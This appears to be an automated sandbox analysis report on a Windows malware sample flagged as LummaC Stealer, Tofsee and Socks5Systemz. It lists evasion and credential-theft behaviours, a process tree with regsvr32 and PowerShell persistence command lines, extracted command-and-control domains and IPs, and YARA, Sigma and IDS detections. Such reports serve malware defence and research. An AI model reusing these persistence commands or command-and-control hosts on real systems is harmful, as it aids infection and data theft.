Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nK8noQeiXl.exe

Overview

General Information

Sample name:nK8noQeiXl.exe
renamed because original name is a hash value
Original sample name:32f7fa32fafc74bb0b26089e37a7fde1.exe
Analysis ID:1665555
MD5:32f7fa32fafc74bb0b26089e37a7fde1
SHA1:f608bb9d9ba24bc86db2436e612bb84f31be2e97
SHA256:c5308205d4d84ddc2a96194fcc509522ada976c3f5ee60e4208008ede1935359
Tags:exeuser-abuse_ch
Infos:

Detection

HTMLPhisher, CryptOne, LummaC Stealer, Socks5Systemz, Tofsee
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
System process connects to network (likely due to code injection or exploit)
Yara detected BlockedWebSite
Yara detected CryptOne packer
Yara detected LummaC Stealer
Yara detected Socks5Systemz
Yara detected Tofsee
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Creates HTML files with .exe extension (expired dropper behavior)
Found API chain indicative of debugger detection
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • nK8noQeiXl.exe (PID: 8572 cmdline: "C:\Users\user\Desktop\nK8noQeiXl.exe" MD5: 32F7FA32FAFC74BB0B26089E37A7FDE1)
    • svchost015.exe (PID: 8648 cmdline: "C:\Users\user\Desktop\nK8noQeiXl.exe" MD5: B826DD92D78EA2526E465A34324EBEEA)
      • DrjfIAN86u.exe (PID: 8856 cmdline: "C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe" MD5: 76435E8885559A7C3EF955DE05646970)
        • DrjfIAN86u.tmp (PID: 8872 cmdline: "C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp" /SL5="$60254,3470653,54272,C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe" MD5: 4979D6D3415EF991208E0E4B04C0474D)
          • ntfs2fat32converter102.exe (PID: 8920 cmdline: "C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe" -i MD5: 6AC5078FC3C5177D6E45251A0E889475)
      • Qv4wdsLMG.exe (PID: 8940 cmdline: "C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe" MD5: FF6CABE0A00FC853F2D889075700D537)
        • Qv4wdsLMG.tmp (PID: 8960 cmdline: "C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp" /SL5="$50036,2140910,174080,C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe" MD5: 1066651F2FDEF4FB17C5A6D7F3976C0A)
          • Qv4wdsLMG.exe (PID: 8992 cmdline: "C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe" /VERYSILENT MD5: FF6CABE0A00FC853F2D889075700D537)
            • Qv4wdsLMG.tmp (PID: 9012 cmdline: "C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp" /SL5="$20528,2140910,174080,C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe" /VERYSILENT MD5: 1066651F2FDEF4FB17C5A6D7F3976C0A)
              • regsvr32.exe (PID: 9056 cmdline: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\user32_8.drv" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
                • powershell.exe (PID: 9072 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                  • conhost.exe (PID: 9080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 8372 cmdline: "PowerShell.exe" -NoProfile -NonInteractive -Command - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                  • conhost.exe (PID: 8344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 4836 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                  • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • vn6ZAuKJ8m7U3.exe (PID: 6776 cmdline: "C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe" MD5: 9208C64CF054174E106794F95A8E0D76)
  • regsvr32.exe (PID: 2540 cmdline: C:\Windows\system32\regsvr32.EXE /s /i:INSTALL "C:\Windows\system32\config\systemprofile\AppData\Roaming\user32_8.drv" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
TofseeAccording to PCrisk, Tofsee (also known as Gheg) is a malicious Trojan-type program that is capable of performing DDoS attacks, mining cryptocurrency, sending emails, stealing various account credentials, updating itself, and more.Cyber criminals mainly use this program as an email-oriented tool (they target users' email accounts), however, having Tofsee installed can also lead to many other problems.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee

Malware Configuration

Threatname: LummaC

{"C2 url": ["proenhann.digital/thnb", "jawdedmirror.run/ewqd", "changeaie.top/geps", "lonfgshadow.live/xawi", "liftally.top/xasj", "nighetwhisper.top/lekd", "salaccgfa.top/gsooz", "zestmodp.top/zeda", "owlflright.digital/qopy"], "Build id": "609a3af8f2b5fbb695363717b3ddf4a67885df"}

Threatname: Socks5Systemz

{"C2 list": ["185.39.17.76"]}

Threatname: Tofsee

{"C2 list": ["quag.cn:443", "jotunheim.name:443"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\5I0ZLKZO7SYLHSOPSEU02A6S8PA.exeJoeSecurity_BlockedWebSiteYara detected BlockedWebSiteJoe Security
      C:\Users\user\AppData\Local\Temp\svchost015.exeJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        C:\Users\user\AppData\Local\Temp\svchost015.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          0000000A.00000002.2572481446.0000000002771000.00000020.10000000.00040000.00000000.sdmpWindows_Trojan_Tofsee_26124fe4unknownunknown
          • 0x1544:$a: 55 8B EC 8B 45 08 57 8B 7D 10 B1 01 85 FF 74 1D 56 8B 75 0C 2B F0 8A 14 06 32 55 14 88 10 8A D1 02 55 18 F6 D9 00 55 14 40 4F 75 EA 5E 8B 45 08 5F 5D C3
          • 0xde95:$b: 8B 44 24 04 53 8A 18 84 DB 74 2D 8B D0 2B 54 24 0C 8B 4C 24 0C 84 DB 74 12 8A 19 84 DB 74 1B 38 1C 0A 75 07 41 80 3C 0A 00 75 EE 80 39 00 74 0A 40 8A 18 42 84 DB 75 D9 33 C0 5B C3
          0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            0000000A.00000002.2572533022.0000000002780000.00000002.10000000.00040000.00000000.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
              00000005.00000002.2574422459.0000000002CD9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                0000000A.00000002.2572238453.0000000000550000.00000040.00000020.00020000.00000000.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
                  Click to see the 16 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  10.2.regsvr32.exe.2859196.1.unpackWindows_Trojan_Tofsee_26124fe4unknownunknown
                  • 0xd44:$a: 55 8B EC 8B 45 08 57 8B 7D 10 B1 01 85 FF 74 1D 56 8B 75 0C 2B F0 8A 14 06 32 55 14 88 10 8A D1 02 55 18 F6 D9 00 55 14 40 4F 75 EA 5E 8B 45 08 5F 5D C3
                  • 0xd695:$b: 8B 44 24 04 53 8A 18 84 DB 74 2D 8B D0 2B 54 24 0C 8B 4C 24 0C 84 DB 74 12 8A 19 84 DB 74 1B 38 1C 0A 75 07 41 80 3C 0A 00 75 EE 80 39 00 74 0A 40 8A 18 42 84 DB 75 D9 33 C0 5B C3
                  10.2.regsvr32.exe.2859196.1.unpackMALWARE_Win_TofseeDetects TofseeditekSHen
                  • 0xe110:$s2: loader_id
                  • 0xe140:$s3: start_srv
                  • 0xe170:$s4: lid_file_upd
                  • 0xe164:$s5: localcfg
                  • 0xe894:$s6: Incorrect respons
                  10.2.regsvr32.exe.5512e6.0.unpackWindows_Trojan_Tofsee_26124fe4unknownunknown
                  • 0xd44:$a: 55 8B EC 8B 45 08 57 8B 7D 10 B1 01 85 FF 74 1D 56 8B 75 0C 2B F0 8A 14 06 32 55 14 88 10 8A D1 02 55 18 F6 D9 00 55 14 40 4F 75 EA 5E 8B 45 08 5F 5D C3
                  • 0xd695:$b: 8B 44 24 04 53 8A 18 84 DB 74 2D 8B D0 2B 54 24 0C 8B 4C 24 0C 84 DB 74 12 8A 19 84 DB 74 1B 38 1C 0A 75 07 41 80 3C 0A 00 75 EE 80 39 00 74 0A 40 8A 18 42 84 DB 75 D9 33 C0 5B C3
                  10.2.regsvr32.exe.5512e6.0.unpackMALWARE_Win_TofseeDetects TofseeditekSHen
                  • 0xe110:$s2: loader_id
                  • 0xe140:$s3: start_srv
                  • 0xe170:$s4: lid_file_upd
                  • 0xe164:$s5: localcfg
                  • 0xe894:$s6: Incorrect respons
                  10.2.regsvr32.exe.5512e6.0.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                    Click to see the 7 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Potentially Suspicious Child Process Of Regsvr32
                    Source: Process startedAuthor: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\user32_8.drv", ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 9056, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }", ProcessId: 9072, ProcessName: powershell.exe
                    Sigma detected: Network Connection Initiated By Regsvr32.EXE
                    Source: Network ConnectionAuthor: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 52.101.41.22, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 9056, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49724
                    Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\user32_8.drv", CommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\user32_8.drv", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp" /SL5="$20528,2140910,174080,C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe" /VERYSILENT, ParentImage: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp, ParentProcessId: 9012, ParentProcessName: Qv4wdsLMG.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\user32_8.drv", ProcessId: 9056, ProcessName: regsvr32.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 52.101.41.22, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 9056, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49724
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\user32_8.drv", ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 9056, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }", ProcessId: 9072, ProcessName: powershell.exe

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Sigma detected: Powershell launch regsvr32
                    Source: Process startedAuthor: Joe Security: Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\user32_8.drv", ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 9056, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }", ProcessId: 9072, ProcessName: powershell.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-04-15T17:03:28.269534+020020283713Unknown Traffic192.168.2.549699104.21.40.117443TCP
                    2025-04-15T17:03:30.657833+020020283713Unknown Traffic192.168.2.549700104.21.40.117443TCP
                    2025-04-15T17:03:32.504005+020020283713Unknown Traffic192.168.2.549701104.21.40.117443TCP
                    2025-04-15T17:03:35.512321+020020283713Unknown Traffic192.168.2.549702104.21.40.117443TCP
                    2025-04-15T17:03:40.237184+020020283713Unknown Traffic192.168.2.549703104.21.40.117443TCP
                    2025-04-15T17:03:43.500528+020020283713Unknown Traffic192.168.2.549704104.21.40.117443TCP
                    2025-04-15T17:03:47.469658+020020283713Unknown Traffic192.168.2.549708104.21.40.117443TCP
                    2025-04-15T17:03:48.515770+020020283713Unknown Traffic192.168.2.549710104.21.53.21443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-04-15T17:03:43.911877+020020287653Unknown Traffic192.168.2.549705185.39.17.76443TCP
                    2025-04-15T17:03:45.144954+020020287653Unknown Traffic192.168.2.549706185.39.17.76443TCP
                    2025-04-15T17:03:47.164133+020020287653Unknown Traffic192.168.2.549707185.39.17.76443TCP
                    2025-04-15T17:03:48.373264+020020287653Unknown Traffic192.168.2.549709185.39.17.76443TCP
                    2025-04-15T17:03:49.598875+020020287653Unknown Traffic192.168.2.549711185.39.17.76443TCP
                    2025-04-15T17:03:51.277894+020020287653Unknown Traffic192.168.2.549712185.39.17.76443TCP
                    2025-04-15T17:03:52.496270+020020287653Unknown Traffic192.168.2.549713185.39.17.76443TCP
                    2025-04-15T17:03:53.697078+020020287653Unknown Traffic192.168.2.549714185.39.17.76443TCP
                    2025-04-15T17:03:54.993303+020020287653Unknown Traffic192.168.2.549715185.39.17.76443TCP
                    2025-04-15T17:03:56.187347+020020287653Unknown Traffic192.168.2.549716185.39.17.76443TCP
                    2025-04-15T17:03:57.477033+020020287653Unknown Traffic192.168.2.549717185.39.17.76443TCP
                    2025-04-15T17:03:58.681384+020020287653Unknown Traffic192.168.2.549718185.39.17.76443TCP
                    2025-04-15T17:03:59.886936+020020287653Unknown Traffic192.168.2.549719185.39.17.76443TCP
                    2025-04-15T17:04:01.087303+020020287653Unknown Traffic192.168.2.549720185.39.17.76443TCP
                    2025-04-15T17:04:02.294736+020020287653Unknown Traffic192.168.2.549721185.39.17.76443TCP
                    2025-04-15T17:04:06.083976+020020287653Unknown Traffic192.168.2.549725185.39.17.76443TCP
                    2025-04-15T17:04:07.292855+020020287653Unknown Traffic192.168.2.549726185.39.17.76443TCP
                    2025-04-15T17:04:08.867662+020020287653Unknown Traffic192.168.2.549729185.39.17.76443TCP
                    2025-04-15T17:04:10.050757+020020287653Unknown Traffic192.168.2.549730185.39.17.76443TCP
                    2025-04-15T17:04:11.253616+020020287653Unknown Traffic192.168.2.549731185.39.17.76443TCP
                    2025-04-15T17:04:12.646671+020020287653Unknown Traffic192.168.2.549732185.39.17.76443TCP
                    2025-04-15T17:04:13.897169+020020287653Unknown Traffic192.168.2.549733185.39.17.76443TCP
                    2025-04-15T17:04:15.110168+020020287653Unknown Traffic192.168.2.549734185.39.17.76443TCP
                    2025-04-15T17:04:16.314426+020020287653Unknown Traffic192.168.2.549735185.39.17.76443TCP
                    2025-04-15T17:04:17.527443+020020287653Unknown Traffic192.168.2.549736185.39.17.76443TCP
                    2025-04-15T17:04:18.743684+020020287653Unknown Traffic192.168.2.549737185.39.17.76443TCP
                    2025-04-15T17:04:19.956274+020020287653Unknown Traffic192.168.2.549738185.39.17.76443TCP
                    2025-04-15T17:04:21.164318+020020287653Unknown Traffic192.168.2.549739185.39.17.76443TCP
                    2025-04-15T17:04:22.350415+020020287653Unknown Traffic192.168.2.549740185.39.17.76443TCP
                    2025-04-15T17:04:23.552882+020020287653Unknown Traffic192.168.2.549741185.39.17.76443TCP
                    2025-04-15T17:04:24.772904+020020287653Unknown Traffic192.168.2.549742185.39.17.76443TCP
                    2025-04-15T17:04:25.983833+020020287653Unknown Traffic192.168.2.549744185.39.17.76443TCP
                    2025-04-15T17:04:27.169765+020020287653Unknown Traffic192.168.2.549745185.39.17.76443TCP
                    2025-04-15T17:04:28.340285+020020287653Unknown Traffic192.168.2.549746185.39.17.76443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-04-15T17:03:44.499897+020028032742Potentially Bad Traffic192.168.2.549705185.39.17.76443TCP
                    2025-04-15T17:03:45.748023+020028032742Potentially Bad Traffic192.168.2.549706185.39.17.76443TCP
                    2025-04-15T17:03:47.760397+020028032742Potentially Bad Traffic192.168.2.549707185.39.17.76443TCP
                    2025-04-15T17:03:48.965041+020028032742Potentially Bad Traffic192.168.2.549709185.39.17.76443TCP
                    2025-04-15T17:03:50.196294+020028032742Potentially Bad Traffic192.168.2.549711185.39.17.76443TCP
                    2025-04-15T17:03:51.882433+020028032742Potentially Bad Traffic192.168.2.549712185.39.17.76443TCP
                    2025-04-15T17:03:53.077764+020028032742Potentially Bad Traffic192.168.2.549713185.39.17.76443TCP
                    2025-04-15T17:03:54.291244+020028032742Potentially Bad Traffic192.168.2.549714185.39.17.76443TCP
                    2025-04-15T17:03:55.586164+020028032742Potentially Bad Traffic192.168.2.549715185.39.17.76443TCP
                    2025-04-15T17:03:56.779745+020028032742Potentially Bad Traffic192.168.2.549716185.39.17.76443TCP
                    2025-04-15T17:03:58.076567+020028032742Potentially Bad Traffic192.168.2.549717185.39.17.76443TCP
                    2025-04-15T17:03:59.267842+020028032742Potentially Bad Traffic192.168.2.549718185.39.17.76443TCP
                    2025-04-15T17:04:00.485608+020028032742Potentially Bad Traffic192.168.2.549719185.39.17.76443TCP
                    2025-04-15T17:04:01.673865+020028032742Potentially Bad Traffic192.168.2.549720185.39.17.76443TCP
                    2025-04-15T17:04:02.881133+020028032742Potentially Bad Traffic192.168.2.549721185.39.17.76443TCP
                    2025-04-15T17:04:06.683045+020028032742Potentially Bad Traffic192.168.2.549725185.39.17.76443TCP
                    2025-04-15T17:04:07.885801+020028032742Potentially Bad Traffic192.168.2.549726185.39.17.76443TCP
                    2025-04-15T17:04:09.448365+020028032742Potentially Bad Traffic192.168.2.549729185.39.17.76443TCP
                    2025-04-15T17:04:10.630222+020028032742Potentially Bad Traffic192.168.2.549730185.39.17.76443TCP
                    2025-04-15T17:04:11.848892+020028032742Potentially Bad Traffic192.168.2.549731185.39.17.76443TCP
                    2025-04-15T17:04:13.248561+020028032742Potentially Bad Traffic192.168.2.549732185.39.17.76443TCP
                    2025-04-15T17:04:14.497524+020028032742Potentially Bad Traffic192.168.2.549733185.39.17.76443TCP
                    2025-04-15T17:04:15.705980+020028032742Potentially Bad Traffic192.168.2.549734185.39.17.76443TCP
                    2025-04-15T17:04:16.912150+020028032742Potentially Bad Traffic192.168.2.549735185.39.17.76443TCP
                    2025-04-15T17:04:18.120175+020028032742Potentially Bad Traffic192.168.2.549736185.39.17.76443TCP
                    2025-04-15T17:04:19.343099+020028032742Potentially Bad Traffic192.168.2.549737185.39.17.76443TCP
                    2025-04-15T17:04:20.558681+020028032742Potentially Bad Traffic192.168.2.549738185.39.17.76443TCP
                    2025-04-15T17:04:21.752336+020028032742Potentially Bad Traffic192.168.2.549739185.39.17.76443TCP
                    2025-04-15T17:04:22.929222+020028032742Potentially Bad Traffic192.168.2.549740185.39.17.76443TCP
                    2025-04-15T17:04:24.151162+020028032742Potentially Bad Traffic192.168.2.549741185.39.17.76443TCP
                    2025-04-15T17:04:25.364741+020028032742Potentially Bad Traffic192.168.2.549742185.39.17.76443TCP
                    2025-04-15T17:04:26.577262+020028032742Potentially Bad Traffic192.168.2.549744185.39.17.76443TCP
                    2025-04-15T17:04:27.742805+020028032742Potentially Bad Traffic192.168.2.549745185.39.17.76443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for dropped file
                    Source: C:\ProgramData\NTFS2FAT32Converter\NTFS2FAT32Converter.exeAvira: detection malicious, Label: HEUR/AGEN.1314980
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeAvira: detection malicious, Label: HEUR/AGEN.1314980
                    Found malware configuration
                    Source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["proenhann.digital/thnb", "jawdedmirror.run/ewqd", "changeaie.top/geps", "lonfgshadow.live/xawi", "liftally.top/xasj", "nighetwhisper.top/lekd", "salaccgfa.top/gsooz", "zestmodp.top/zeda", "owlflright.digital/qopy"], "Build id": "609a3af8f2b5fbb695363717b3ddf4a67885df"}
                    Source: 10.2.regsvr32.exe.5512e6.0.raw.unpackMalware Configuration Extractor: Tofsee {"C2 list": ["quag.cn:443", "jotunheim.name:443"]}
                    Source: ntfs2fat32converter102.exe.8920.5.memstrminMalware Configuration Extractor: Socks5Systemz {"C2 list": ["185.39.17.76"]}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\UNIQTHREE[1].fileReversingLabs: Detection: 50%
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exeReversingLabs: Detection: 50%
                    Source: C:\Users\user\AppData\Roaming\is-4R09J.tmpReversingLabs: Detection: 28%
                    Source: C:\Users\user\AppData\Roaming\user32_8.drv (copy)ReversingLabs: Detection: 28%
                    Multi AV Scanner detection for submitted file
                    Source: nK8noQeiXl.exeVirustotal: Detection: 38%Perma Link
                    Source: nK8noQeiXl.exeReversingLabs: Detection: 55%
                    Sample uses string decryption to hide its real strings
                    Source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: proenhann.digital/thnb
